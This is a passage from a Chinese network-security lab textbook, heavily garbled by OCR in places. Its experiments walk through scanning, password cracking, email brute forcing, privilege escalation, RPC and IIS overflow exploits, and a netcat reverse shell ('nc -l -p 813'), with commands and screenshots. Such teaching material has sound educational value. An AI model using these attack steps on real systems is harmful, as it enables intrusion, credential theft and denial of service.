服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 172. 19. 25. 10, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 共享 扫描 器 Shed. exe. 

3. 实验 步骤 

(1) 打开 Shed. exe 如 图 9-115 所 示 。 

(2) 设置 起 始 IP 为 :172. 19.25. 1. 2 j IP X: 172. 19. 25.255, 查 找 这 一 网 段 中 存在 的 
主机 , 单 击 按钮 “开始 ”开始 扫描 ,扫描 结果 如 图 9-116 所 示 。 

结果 显示 扫描 出 来 的 IP 地 址 下 的 计算 机 C 盘 是 默认 隐 式 共享 ,实验 中 Windows XP 
可 以 扫描 Windows 2000 Server. Windows 20000 Advanced ; Windows 2000 Server 可 以 扫 
dii Windows 2000 Advanced, 
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S Shed 1.01 


Rh rr: [1712.19.25 .1 
Tub rr: [172 19 25 n — mI 


S Shed 1.01 http://keir.net 
起 始 r: [12.19.25 
füb 1r [172 19 25 255 XsIpD 


发 现 的 共享 资源 E rao 展开 名) 驻 证 扫描 


= Bus 172 19.25. 102 ~ WIN2000-SRV-VM. 


图 9-116 扫描 出 来 的 结果 
思考 题 : 
1. 在 共享 的 C 盘 上 设置 一 个 文件 夹 的 共享 ,能 否 扫描 出 来 ? 
2. 在 没有 共享 的 C 盘 上 设置 一 个 文件 夹 的 共享 ,能 否 扫描 出 来 ? 


实验 十 八 _ 开 放 端 口 扫描 PortScan 


1. 实验 目的 

学 会 使 用 工具 软件 PoertScan 得 到 对 方 计算 机 开放 的 端口 ,为 攻击 做 好 准备 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 172. 19. 25. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 172. 19. 25. 103, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 
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工具 软件 : portscan. exe。 
3. 实验 步骤 


(1) 打开 portscan. exe 如 图 9-117 所 示 。 


(2) 对 IP 为 172. 19. 25. 103 的 服务 器 进行 端口 扫描 ,在 Scan 文本 框 中 输入 服务 器 IP 


地 址 , 单 击 按钮 START, 如 图 9-118 所 示 。 
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9-117 软件 主 界面 
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9118 ”扫描 出 来 的 结果 


总 结 : PortScan 工具 软件 可 以 将 所 有 端口 的 开放 情况 逐个 测试 ,通过 端口 扫描 ,可 以 知 
道 对 方 开放 了 哪些 网 络 服务 ,从 而 根据 某 些 服务 的 漏洞 进行 攻击 ,例如 图 9-118 所 示 的 21 


端口 的 FTP 的 服务 和 80 端口 Web 服务 等 。 
思考 题 : 


写 出 一 些 服 务 常用 的 端口 。 


实验 十 九 ”漏洞 扫描 X-Scan 


1. 实验 目的 
学 会 利用 工具 软件 X-Scan 来 扫描 服务 器 的 漏洞 。 
扫描 内 容 包括 ， 

。 远程 操作 系统 类 型 及 版 本 


* 标准 端口 状态 及 端口 Banner 信 


息 


。 SNMP 信息 ,CGI 漏洞 ,IIS 漏洞 ,RPC 漏洞 ,SSL 漏洞 
* SQL-Server, FTP-Server , SMTP-Server, POP3-Server 
。 NT-Server 55 E14 HI P1 NT 服务 器 NeTbios 信息 

。 注册 表 信息 等 
2. 实验 所 需 软 件 


客户 机 操作 系统 : 


Windows 2000 /Windows XP.IP 地 址 为 192. 168. 1. 2, 


服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168.1. 5, 
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实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 漏洞 扫描 工具 X-Scan。 

3. 实验 步骤 

(1) 执行 X-Scan, 主 界面 图 9-119 Bros ,选择 菜单 栏 "设置 "下 的 菜单 项 “扫描 模块 ”, 扫 
描 模块 的 设置 如 图 9-120 所 示 o 
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一， 系统 要 求 : Windovs 9x/WT4/2000 


= wenn: 


采用 多 贱 程 方式 对 指定 I? 地 址 段 或 单机 ) 进 行 安全 漏洞 榨 测 , 支持 白 件 功能 ,提供 了 图 形 
面 和 命令 行 两 种 换 人 方式， 扫描 内 容 包 括 : 远程 失 作 系统 类 型 及 版 本 ， 标 准 端 口 状态 及 芒 口 。| 
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9-119 软件 主 界面 
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9320 ”扫描 模块 设置 


(2) 确定 要 扫描 主机 的 IP 地 址 或 者 IP 地 址 段 , 选 择 菜 单 栏 “设置 "下 的 菜单 项 “扫描 参 
数 ”, 扫 描 一 台 主 机 ,在 “指定 IP 范围 ” 框 中 输入 : 192. 168. 1. 5, 如 图 9-121 所 示 。 设 置 完毕 
后 ,进行 漏洞 扫描 ,点 击 工具 栏 上 的 绿色 图 标 “ 开 始 ”, 开 始 对 目标 主机 进行 扫描 ,扫描 结果 如 
图 9-122 所 示 。 

下 面 我 们 利用 扫描 出 来 的 结果 删除 网 页 ,在 没有 删除 前 ,我 们 打开 的 网 页 如 图 9-123 
所 示 。 

(3) 然后 利用 扫描 出 来 的 漏洞 删除 网 页 ,如 图 9-124 所 示 。 删 除 后 就 不 能 打开 这 个 网 
页 了 ,如 图 9-125 所 示 。 
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Jweristt/cbeck Wat. Melte Mele etiam/ ond. exo! / CNMI V 
leeripts KW 1 WESS / MOSES /oinat/ yrt ome/ ond. ere?/ ehlir 
faeripts/ -XXEMO /EY S TOSMOe sa systa má. ene/ eH 
aerigta/ NESSES | jvisnt/ systundC/ end. ene! cdir 

oeripty Me /se | Ee finat system et/ lls 

aeripta/ Wise /WESe |. MEeisat/ayaton32/ ond. ert/ cH 

rerigtey SS. /vixat/ yr/ end. exet/ char. 

Jweripts/ ESSI. / XEM / SOSE /vinet/syrt me/ mt enter 
Jecript! 'ESEXMD / CSSS / SESE inat/ yit e/o echar 
Jeerigts/ ESOSI). vina eyvtenD2/ end eno/ er 

fseriptu] SRE MSIE MSIE sefvim /ryt /end enit er 

/reripty) esse / wsse | SSe /eitmt/ yr/ ond. en 

[seriis Sse / WS5e | KtSSerianti system] ond my/ctdhr 

w/ SSe Jena nysta l/m eve? / chr 
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图 9-123 可 以 打开 的 网 页 
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LXMD WD FEV mo IAD SEO 
| >m- 2- 0AA QNE uem oe |3- 3 


[hatto [i6] htp://192 16.1 Sjscrots/. 5656359863. wonrilsystemszjerd exe? [cedelec Vnetpublyeroot unde. htm. 7) esu wm 
CGI Error 


The specified CGI application misbehaved by not returning a complete set of HITP headers. The headers it did 
return are: 


zl 
DL —--—— —— À—— a 
图 9-124 利用 扫描 出 来 的 漏洞 删除 网 页 


DLRA RRE GHN - Microsoft Internet Explor 
| XRD ir 50 A ND ano 


|m- s- OAA A uem gme 33 
ER 


您 没有 权限 查看 读 网 页 


修 提 供 的 证 书 没 有 梭 限 查 看 说 目录 或 网 页 。 


请 尝 汪 下列 脾 作 ; 
。 BICIS, JERROCUUESRUR. 


。 OGORUWEEGRAESEGH SER, qs HT 
系 ， 其 电子 邮件 地 址 戒 虹 话 号 码 请 参阅 1e 168 1 5 


IETF 401.2 - 未 授权 : IRZBICR TE GRECE RAE 
Internet. 信息 服务 


技术 信息 ( 支持 个 人 ) 


RA: 
"WR SSSGTERBRNTTETWRE m AGRERIHT 
Dr 


图 9-125 网 页 打 不 开 
思考 题 : 扫描 出 来 的 TIS 漏洞 很 多 ,用 哪 一 个 漏洞 删除 网 页 ? 


实验 二 十 ”端口 扫描 器 SuperScan 


1. 实验 目的 

SuperScan 是 一 款 功能 强大 的 端口 扫描 工具 。 其 功能 包括 : 

。 通过 ping 来 检验 IP 是 否 在 线 

。IP 和 域名 相互 转换 

。 检验 目标 计算 机 提供 的 服务 类 别 

。 检验 一 定 范 围 目标 计算 机 是 否 在 线 和 端口 情况 

。 工具 自 定义 列表 检验 目标 计算 机 是 否 在 线 和 端口 情况 等 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 192. 168. 1. 1 。 
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服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168. 1. 2, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 端口 扫描 器 SuperScanV4. 0-RHC. exe。 

3. 实验 步骤 

不 需要 安装 ,直接 执行 如 图 9-126 所 示 的 SuperScanV4. 0-RHC. exe 文件 ,在 主机 名 中 
输入 要 扫描 的 主机 名 ,软件 自动 转换 成 卫 地 址 。 软 件 界 面 如 图 9-127 所 示 , 单 击 左下 角 的 
按钮 ,开始 扫描 。 


f SuperScan 4.0 
文件 下 dm FV mo 工具 Wi 
Qa- O- $ Jm (xn i 

HUE QU O E: nulinei\ 网 络 安 全 技术 与 实验 教程 \he-SuperScan\SuperScan 4.0 
ELI 


| seenlog txt 
XXX 


XftUERSPIEXUS. 2l t e 
SE. WI 1 à 

Wiz xeXCRONS RI 多 精品 
9 Web pe 各 对 半生 


ku] 共享 此 文件 天 zt PUES 和 
SRRA. txt 
LEX 


9-126 安装 的 软件 


"d SuperScan 4.0 


338 | 主机 和 服务 扫描 设置 | 扫 拱 法 项 | 工具 ”| Windows F| XF | 
IP 地 址 


主机 名 /TP [FRc-2013100amv. | prie 结束 r 清除 所 选 


FHI XIE 192.168.1.2 eum 
mexpru | en] 
Aene | 


Live hosts this batch: 1 


Total live hosts discovered 
Total open TCP ports 
Total open UD? porta 


Performing banner grabs 
TCP banner grabbing (0 ports) 
UDP banner grabbing (0 porta) 


Discovery scan finished: 04/20/14 09:38:05 


»|mji Emt 中 
TR "mn 
UIP open: 0 1/1 done 


UL 


Saved log file Live 1 [TCP open: 0 


图 9-127 扫描 的 结果 


to 
eo 
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实验 二 十 一 ”得 到 管理 员 密 码 FindPass 


1. 实验 目的 
使 用 工具 软件 FindPass 得 到 管理 员 的 登录 用 户 名 和 密码 。 
2. 实验 所 需 软件 


ak: Windows XP, Windows 2000 Server( Windows 2000 Server Advanced), 
diim FindPass. exe, 


M 


系统 以 后 ,离开 计算 机 时 没有 锁定 计算 机 ,或 者 直接 以 自己 的 账号 登 
:别人 使 用 ,就 可 以 使 用 FindPass 工具 对 该 进程 进行 解码 

exe 文件 复制 到 C 盘 根 目 录 下 ,运行 该 程序 ,将 得 到 当前 用 户 的 登录 
in. tn 9-128 所 示 


:将 FindPas 


WINNT system32 cmd.ene- 


Windows 2008 [Version 5.80.2195] 
权 所 有 1995-2008 Mic ft Corp. 


IC: PindPass .exe 


To Find Password in the Winlogon process 
Usage: F: exe DomainName UserName PID-of-WinLogon 


The debug privilege has been added to P. rdReninder. 
The WinLogon proc 


图 9-128 解密 出 来 用 户 名 和 密码 


总 结 : 可 以 侵入 某 个 系统 ,就 有 可 能 使 用 FindPass 获取 管理 员 或 超级 用 户 的 


实验 二 十 二 ”电子 邮箱 暴力 破解 


1. 实验 目的 
学 会 使 用 工具 软件 bkrain 破解 电子 邮箱 密码 。 
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2. 实验 所 需 软件 

系统 要 求 : Windows XP /All。 

所 需 软 件 : bkrain。 

3. 实验 步骤 

(1) 打开 bkrain 软件 ,如 图 9-129 所 示 。 


[- ex Ort, ~/ emn. tr z 
C 自 定 字符 集 - c 字 奥 文 件 


图 9-129 软件 界面 
(2) 首先 设置 密码 字典 “dic. exe”, 如 图 9-130 所 示 。 


三 选取 字符 集 ; 

IV 012...809 [^ sbe .yz 厂 MIC... TZ 
T e$ Ow,- /:: eI - UI 
CHEER C 字 奥 文 件 ; 


| Re TS » [max jest 


118 KW 


r dicot 
文本 文档 r 
EE- a 
Em 
RRM: [dic txt TO 
文件 类 型 0): [ar Files QER) 可 


T ARRARIR 四 


^ 


图 9-130 选择 密码 字典 


(3) 设置 密码 位 数 、Pop3 地 址 、Pop3 用 户 名 , 单 击 输入 用 户 名 后 面 的 按钮 ,如 图 9-131 
所 示 , 显 示 成 功 登录 。 单 击 “ 广 度 算法 ”就 破解 出 来 邮箱 密码 了 ,如 图 9-132 所 示 。 
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xz @0 saio mali096 Eg asil 


xr ax 
(emt. m 
文件 


G 


图 9-132 ”破解 出 来 的 邮箱 密码 
注意 : 在 破解 过 程 中 ,首先 输入 Pop3 地 址 , 单 击 地 址 后 面 的 按钮 验证 ,只 有 地 址 正确 ， 
才能 输入 Pop3 用 户 名 , 单 击 用 户 名 后 面 的 按钮 登录 。 


思考 题 : 验证 : 输入 Pop3 地 址 后 , 单 击 后 面 的 按钮 ,登录 地 址 ,验证 Pop3 地 址 存在 否 ? 
如 果 存 在 ,输入 用 户 名 , 单 击 后 面 的 按钮 登录 。 


实验 二 十 三 ”破解 Office, Winzip 和 Winrar 文档 密码 


1. 实验 目的 
学 会 使 用 工具 软件 Advanced Office XP Password Recovery 破解 已 经 设置 密码 的 
Office 文档 的 密码 ,同样 可 以 破解 PPT、Excel、Winzip、Winrar, 使 用 方法 相同 。 
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2. 实验 所 需 软件 

系统 要 求 : Windows XP/All。 

工具 软件 : Advanced Office XP Password Recovery. exe。 

3. 实验 步骤 

CD 对 一 份 名 为 "破解 ”的 Word 文档 进行 加 密 ,选择 Office XP 或 者 Office 2000 菜单 栏 
“工具 ”下 的 “选项 "菜单 ,如 图 9-133 所 示 。 


ti 


161 cas 121 6 MEN 


Wo (wi (ci imr 181 
-org 


ails v e > 
eh 


æ — am Í 


9-133 打开 Word 文档 


(2) 在 弹出 的 “选项 "对话 框 中 选择 “安全 性 ?选项 卡 ,在 “打开 文件 时 的 密码 ”和 ”修改 文 
件 时 的 密码 ”两 个 文本 框 中 都 输入 *1234”, 并 单 击 “ 确 定 ” 按 钮 ,如 图 9-134 所 示 。 

(3) 保存 并 关闭 该 文档 ,如 果 想 再 次 打开 该 文档 就 需要 输入 密码 ,如 图 9-135 所 示 。 

(4) 该 密码 是 4 位 数 ,所 以 使 用 工具 软件 Advanced Office XP Password Recovery 可 以 
快速 破解 Word 文档 密码 。 首 先 打开 该 软件 ,如 图 9-136 所 示 。 

单 击 工具 栏 上 的 Open File 按钮 ,打开 刚才 加 密 的 Word 文档 ,并 设置 密码 的 长 度 最 短 
的 是 1 位 ,最 长 的 是 4 位, 单 击 工具 栏 的 “开始 图标, 如 图 9-137 所 示 。 开 始 大 约 0. 1 秒 左 
右 , 密 码 被 破解 出 来 ,如 图 9-138 所 示 。 

总 结 : 该 软件 除了 能 破解 Word 文档 ,还 可 以 破解 Excel XE, PowerPoint 文档 的 密码 
以 及 Winzip 和 Winrar 的 密码 。 
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NEWER BI | 用 户 信息 | XC | 中 文 版 式 | 文件 位 置 
视图 | 7A | aa | 打印 | 保存 | 安全 性 
HOLENE - 

打开 文件 时 的 密码 四) 
此 文档 的 文件 共享 选项 

修改 文件 时 的 密码 昌 ) eee 
建 汉 以 只 读 方 式 打开 文档 到 ) 
隐私 选项 
口 保存 时 从 文件 属性 中 删除 个 人 信息 Q) 
打印 、 保 存 或 发 送 包含 修订 或 批注 的 文件 之 音 结 出 材 售 中 ) 
[7 fH T AES SEHR ERR LUN. D 
保存 时 标记 可 见 加 ) 


请 键入 打开 文件 所 需 的 密码 
CV. Administrator RD VEI doc 


图 9-134 设置 密码 图 9-135 打开 需 要 密码 


^AOXPPR 2.00 - Untitled 
File Recovery Internet VBA Backdoor Help 


È ome. ~ Dc BH PE B SEA aS 9205 
Fie Name Type of attack 
j 人 Brutedorce attack (C Dictionary attack. 

C. Brutedorce with mask 


Brute force | Dictionary | Auto-save | Options | Benchmark | 
Brutelorce options 
Password length ophons Brute torce tange options 
F Alpintabe [7 — [7 
Mnmalengh Dd 7 PAZE oa F Catnchnea è 


Maximal lengh [3 下 Starting password [1 


[g 


Cunent password 


Log window 
Date, Time Event 
(à) 204-316 1216:35 MS Excel is installed at DAOFFICETINEXCEL EXE. 
d 2014-3316 1316.35 Version ol MS Excel is 11.0.5612 0000 
I 2014.3:16 1916:35 MS Outlook is installed at D'NOFFICE 11NOUTLOOK EXE 
(à) 2014316 19 16:35 Version of MS Outlook is 11.0,5510,0000 


Progress ndcalor ox 
Advanced Office XP Password Recovery Professional version 2.00 Copyright 71999-2002 ElcomSoft Co Ltd 


图 9-136 软件 主 界面 


思考 题 : 
1. 用 本 实验 的 软件 确 解 PPT、Excel 的 密码 , 写 出 实验 步 又 。 
2. 用 本 实验 的 软件 破解 Winrar, Winzip 的 密码 , 写 出 实验 步骤 。 
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File Recovery Internet VBA Backdoor Help 


[£M doc 


Brutedorce | Dictionary | Auto-save | Options | Benchmark | 
Bruteforce options 
Password length option Bruteorce range option: 


Al pii a 2 
Meinallengh [1 四 z aei ~ T^ Custom charset 


Maximal length [4 四 Starting password: [1171 [! 


Mak[| 0000 BK 


Current speed 


| Date. Time. | Event 
(d) 2014316 1917:24 Recognizing file format 
d) 2014316 191724 Selected fle is a Microsolt Word Document cx Template 
(d) 20145316 19:17:24 Microsolt Word Version: 97, 2000 ox 2002 (XP 
d) 20143.16 19:17:26 Fie VEM doc successluly opened 


Progress indicator ox 
[Advanced Office XP Password Recovery Professional version 2 00 Copyright 71999-2002 ElcomSoft Co. Ltd 


9-137 设置 


essfully rec 


Advanced Dthce XP Password Recovery Prolezsional statistics. 


9-138 ”破解 出 来 的 密码 


实验 二 十 四 “普通 用 户 提升 为 超级 用 户 GetAdmin 


1. 实验 目的 
学 会 使 用 工具 软件 GetAdmin, 在 普通 用 户 登录 状态 下 建立 管理 员 用 户 。 
2. 实验 所 需 软件 


系统 要 求 : Windows 2000 Advance (Windows 2000 Server), 

软件 要 求 : GetAdmin. exe. 

3. 实验 步骤 

(1) 用 普通 用 户 身份 登录 Windows 2000 Advance 系统 ,打开 工具 软件 ,如 图 9-139 所 示 。 
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(2) 单 击 New 按钮 ,添加 用 户 名 ,如 图 9-140 所 示 。 


$ NT/2K Privilege Breaker— by Star 


ET 


-Saleet user (s) vho u wnat to add into Adninistraters group: — 


| 
rusar, 


A 9-139 主 界面 A 9-140 建立 用 户 


(3) 单 击 OK 按钮 ,成 功 添加 用 户 并 用 新 建立 的 用 户 登录 ,如 图 9-141 所 示 。 查 看 该 用 
户 的 属性 ,属于 Administrators 组 ,如 图 9-142 所 示 , 具 有 超级 用 户 的 权限 ,如 可 以 建立 用 


户 等 。 


登录 到 Windows 


BPO [eee 
sup M  — ^ — 
Cw ] mm | ww »| 


9-141 新 建 用 户 登录 


jm zv || e 小 | 向 | 四 | X sB e 


管理 计算 机 ( 域 ) 的 内 置 帐 户 

供 来 宾 访 问 计算 机 或 访问 晟 ! 
覃 名 访问 Internet (BB IRSE 
局 动 进程 之 外 的 应 用 程序 的 


这 个 用 户 帐户 被 终端 服务 所 


Administrators 


图 9-142 登录 用 户 属于 超级 用 户 组 


思考 题 : 普通 用 户 和 超级 用 户 的 区 别 是 什么 ? 请 实验 验证 。 


实验 二 十 五 ”利用 RPC 漏洞 建立 超级 用 户 


1. 实验 目的 

学 会 使 用 工具 软件 scanms \attack .OpenRpcSss 在 目标 计算 机 上 新 建 用 户 ,并 通过 该 用 
户 来 控制 对 方 的 计算 机 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 172. 19. 25. 101, 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 172. 19. 25. 103, 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

[ 具 软 件 : scanms. exe,attack. exe, OpenRpcSs. exe, 

3. 实验 步骤 

CD 首先 复制 scams. exe 到 C 盘 根 目录 下 ,设置 检查 地 址 段 为 172. 19. 25. 101 一 
172. 19. 25. 105 的 主机 ,检查 过 程 如 图 9-143 所 示 


AWINNT\system32\ cmd.exe 


ScanMs Tool ) 2003 Internet Security Systems 
for systems vulnerable to 
p VinXP/Vin2k, 
provides no warrantees for any purpose 


e at own risk. Runs best from WinXP. 


IP fiddress REMACT SYSACT DCOM Version 


[UULN] (UULN) 5.6 
[UULN] [VULN] 5.6 


A 9-143 检查 出 来 的 RPC 漏洞 


(2) 可 以 看 出 172. 19. 25. 102 和 172. 19. 25. 103 这 两 台 计 算 机 都 有 RPC 漏洞 。 下 面 
JH attack. exe 对 172. 19. 25. 103 进行 攻击 ,如 图 9-144 所 示 ,攻击 结果 是 在 对 方 计算 机 上 建 
立 一 个 具有 管理 员 权限 的 用 户 ,并 终止 对 方 的 RPC 服务 。 新 建 用 户 名 和 密码 是 都 是 qing10 
这 样 就 可 以 登录 到 对 方 计算 机 ,如 图 9-144 所 示 


CG\WIeT system3Z\comd.exe 


Remote DCOM RPC Buffer Overflow Exploit 
- Original code by FlashSky and Benjurry 
L- Rewritten by qingiB18 Chttp://www.ercist.com.cn? 
- modified by qingiBiGBercist.iscas.ac.cn 


[C: Onet use N\M72.19.25.183\ipc$ qingið /user:qinglg 
命令 成 功 完成 。 


图 9-144 攻击 后 新 建 用 户 
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(3) RPC 服务 终止 操作 系统 将 使 许多 功能 不 能 使 用 ,非常 容易 被 管理 员 发 现 ,使 用 
OpenRpcSs. exe 使 对 方 计算 机 重启 RPC 服务 ,如 图 9-145 所 示 。 


图 9-145 RPC 重启 


结 : 只 要 成 功 建立 用 户 就 可 以 利用 net use 连接 上 目标 计算 机 ,RPC 溢出 漏洞 对 SP4 
也 适用 ,必须 打 专 用 补丁 。 disi debes bc T ni EC VULN]. 
idee : 知道 用 户 名 和 密码 后 ,如 何 登 录 到 对 方 机 器 


实验 二 十 六 “利用 nc. exe 和 snake. exe 工具 进行 攻击 


1. 实验 目的 
学 会 使 用 工具 软件 ne snake 利用 IIS 溢出 在 目标 计算 机 上 开放 一 个 端口 ,再 用 工具 软 
件 连接 到 该 端口 ,入 侵 对 方 计 算 机 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 172. 19. 25. 102, 

服务 器 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 172. 19. 25. 103。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

[ 具 软 件 : nc. exe,snake. exe. 

3. 实验 步骤 

(1) 把 nc. exe 复制 到 本 地 计算 机 C 盘 根 目 录 下 ,把 本 地 IP 设置 为 172. 19. 25. 102, 把 
攻击 的 计算 机 IP 地 址 设 为 172. 19. 25. 103 。 首 先 利用 nc. exe 命令 监控 本 地 的 813 端口 ,使 
用 的 基本 命令 是 “nc -l -p 813”, 如 图 9-146 所 示 。 

(2) 上 一 步 的 窗口 要 一 直 保留 ,启动 工具 软件 snake. exe, 按 要 求 设置 IP 地 址 。 本 地 IP 
为 172. 19. 25. 102 ,要 攻击 的 IP 地 址 为 172. 19. 25. 103。 选 择 溢出 选项 的 第 一 项 ,端口 设 为 
813 ,如 图 9-147 所 示 。 

设置 好 以 后 , 单 击 “IDQ 溢出 ”按钮 ,程序 显示 的 攻击 提示 信息 如 图 9-148 所 示 。 


to 


~ 


Microsoft Windows 2888 [Version 5.88.2195] 
«c» 版 权 所 有 1985-2088 Microsoft Corp. 


C:Onc -1 -p 813 


图 9-146 监听 本 地 端口 
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图 9-147 设置 攻击 选项 


被 攻击 地 址 rm 
I [i72 19.25. 103 Eort [50 


myt 
mirant, 道 出 选项 
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A 9-148 ”攻击 提示 信息 
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查看 nc 命令 的 DOS 框 ,在 该 界面 下 ,已 经 执行 设置 的 DOS 命令 。 对 方 计算 机 的 C 盘 
根 目录 已 经 列 出 来 ,如 图 9-149 所 示 。 


Microsoft Vindows 2888 [Version 5. 
KC》 版 权 所 有 1985-2000 Microsoft Corp. 


有 
序列 号 是 B45P-6669 


eis 的 目录 


VINNT 
Documents and Settings 
Progran Piles 

Inetpub 


LAE n 
目录 3.193.405.4408 可 


图 9-149 获取 对 方 机 器 的 目录 


利用 TIS 溢出 在 对 方 的 计算 机 开放 一 个 端口 ， 
对 方 计算 机 。 


总 结 : IIS 除了 存在 漏洞 ,还 可 外 

再 利用 工 上 - 具 软 件 连接 到 该 端口 ,就 可 以 
. 能 否 在 图 9-147 中 绑 定 别 的 命令 ? 

2. 在 图 9-149 中 ,显示 完 目 录 和 文件 后 ,执行 ipconfig, 7R 


LR 


x 


侵 


cH 


" 


-十 七 SMBdie 致命 攻击 


1. 实验 目的 

会 使 用 工具 软件 SMBdie ,使 被 攻击 的 计算 机 蓝屏 重新 启动 
2. 实验 所 需 软 件 
系统 要 3 
[ 具 软 件 : SMBdie. exe 
3. 实验 步骤 
COD 打开 SMBdie. exe, 软 件 主 界面 如 图 9-150 所 示 。 


k: Windows 2000 Server. Windows 2000 Advance, 


senóing a specaly crafted SMB request. NETBIOS name 


xj 
What ie SMBdie ? Computer [IP address] 
GA l's a proof of concept toot = 和 
Irt some to crath roms conpuer by Cea] 
Eg 


What computers sre vunerable LL 
Widow NT/2/P] NET ACI wih NETBIOS 

enabled Status 

Asha uk dnd. 
snob Ipe:ora io 


Call to ams. -Infomation anarchy 


Han/ /www rec ara/irtohnsschyniohrnarchy him 


图 9-150 主 界面 
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(2) 设置 本 地 主机 IP 172. 19. 25. 102, 要 攻击 的 主机 IP 172. 19. 25. 103 和 主机 名 
win2000101 如 图 9-151 所 示 o 
EX xi 


What is SMBde ? 
(AM) It's a proof of concept tool 
|s è possible to crash Windows computers by 


sendng a specialy cralted SMB request 


What computers are vulnerable ? 
Windows NT/2k/XP/ NET RCI with NETBIOS 


enabled Sam 
Aühot [Wirsock ruseed 
zamob tonal n 


Call to ams - Information anarchy 


hitg.//wvew.nmirc org/IntoAnarchy/ nfoAnarchy htm. 
图 9-151 输入 要 攻击 的 主机 IP 和 主机 名 
(3) 单 击 Kill, 该 软件 开始 攻击 目标 主机 ,目标 主机 变 蓝 屏 开 始 重 启 ,如 图 9-152 所 示 o 


wn STOP: OxO000001E (BxCB800005 ,06x8048919B,8x00000001,6x66769865) 
KMODE_EXCEPT ION_NOT_HANDLED 


wn Address G84B910D base at 860400000, DateStamp 304d9b17 - ntoskrnl .exe 


A 9-152 被 攻击 的 机 器 蓝屏 


总 结 : 该 攻击 对 Windows 2000 系列 系统 基本 都 是 蓝屏 ,对 Windows XP 系统 立刻 重 
启 , 对 Windows Server 2003 也 有 效 
思考 题 : 对 不 同 的 操作 系统 使 用 SMBdie 软件 ,结果 如 何 ? 


实验 二 十 八 _ 利 用 打印 漏洞 cniis 建立 用 户 


学 会 使 用 工具 软件 cnnis 利用 打印 漏洞 在 对 方 计算 机 上 
. 实验 所 需 软件 


COD 把 工具 软件 cniis. exe 复制 到 C 盘 根 目录 下 ,攻击 服务 器 的 IP 为 172. 18. 25. 103, 
执行 程序 ,如 图 9-153 所 示 。 
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6^ CG\WINNT\system32\cmd exe 
icrosoft Windows 2888 [Version 5.88.2195] 
kc》 版 权 所 有 1985-2888 Microsoft Corp. 


:\Deniis -exe 172.19.25.183 8 
[SP type: B 
Bhellcode sendedy 


If success,the target host will add a fdnin User named hax,its passwd is hax. 
ood lucktt? 


图 9-153 攻击 界面 


执行 完 cniis 命令 后 ,如 果 建 立 用 户 成 功 ,将 会 在 目标 计算 机 上 建立 一 个 用 户 名 和 密码 
都 是 hax 的 用 户 ,该 用 户 属于 管理 员 用 户 组 。 


总 结 : 经 过 测试 ,该 漏洞 在 SP2、SP3 及 SPA 版 本 上 仍然 存在 ,但 是 不 保证 百分之百 人 
侵 成 功 。 
思 


用 建立 的 用 户 名 和 密码 ,建立 信任 连接 
3. ， 如何 验 证 该 用 户 属 于 管理 员 用 户 组 ? 


实验 二 十 九 ”使 用 工具 RTCS 远程 开启 Telnet 服务 


1. 实验 目的 

使 用 工具 RTCS 并 且 有 对 方 管理 员 的 用 户 名 和 密码 ,就 可 以 Telnet 登录 到 对 方 的 命令 
行 ,进而 操作 对 方 的 文件 系统 。 

2. 实验 所 需 软件 

服务 器 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 192. 168. 1. 2。 

客户 机 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 1. 3。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server / Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

[ 具 软 件 : RTCS. vbe, 

3. 实验 步骤 

利用 工具 RTCS. vbe 可 以 远程 开启 对 方 主机 的 Telnet 服务 ,使 用 该 工具 需要 知道 对 方 具 
有 管理 员 权 限 的 用 户 名 和 密码 。 使 用 的 命令 是 “cscript RTCS. vbe 192. 168. 1. 2 Administrator 
123456 1 23”, 其 中 cscript 是 操作 系统 自 带 的 命令 ,RTCS. vbe 是 该 工具 软件 的 脚本 文件 ， 
IP 地 址 是 要 启动 Telnet 的 主机 地 址 ,Administration 是 用 户 名 ,123456 是 密码 ,1 是 登录 系 
统 的 验证 方式 ,23 是 Telnet 开放 的 端口 。 该 命令 执行 时 根据 网 络 的 速度 ,需要 一 段 时 间 , 开 
启 远程 Telnet 服务 的 验证 过 程 如 图 9-154 所 示 。 

